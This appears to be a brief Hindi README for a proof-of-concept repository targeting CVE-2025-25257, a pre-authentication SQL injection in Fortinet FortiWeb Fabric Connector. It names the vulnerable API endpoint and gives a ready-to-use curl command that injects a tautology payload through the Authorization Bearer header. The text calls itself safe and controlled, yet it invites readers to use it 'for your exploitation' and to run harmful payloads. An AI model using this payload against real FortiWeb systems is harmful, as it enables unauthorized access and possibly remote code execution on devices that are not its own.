
FortiWeb में CVE-2025-25257 भेद्यता का शोषण करना। यह रिपॉजिटरी सुरक्षित प्री-प्रमाणित SQL injection प्रदर्शित करता है।
CVE-2025-25257 Fortinet FortiWeb Fabric Connector संस्करण 7.0 से 7.6.x में एक प्री-ऑथेंटिकेशन SQL इंजेक्शन भेद्यता है।
यह दोष हमलावरों को कमजोर API एंडपॉइंट में दुर्भावनापूर्ण SQL कमांड इंजेक्ट करने की अनुमति देता है, जो संभावित रूप से रिमोट कोड एक्ज़ीक्यूशन (RCE) की ओर ले जाता है।
इस रिपॉजिटरी में SQL इंजेक्शन वेक्टर को सुरक्षित और नियंत्रित तरीके से प्रदर्शित करने वाला एक PoC शामिल है।
यह आपके शोषण के लिए ओपन सोर्स है।-
/api/fabric/device/statusAuthorization: Bearer हेडर और तैयार किए गए पेलोड की आवश्यकता हैनिम्नलिखित curl कमांड SQL इंजेक्शन का पता लगाने को प्रदर्शित करता है आप हानिकारक पेलोड निष्पादित कर सकते हैं:
curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
https://<fortiweb-ip>/api/fabric/device/status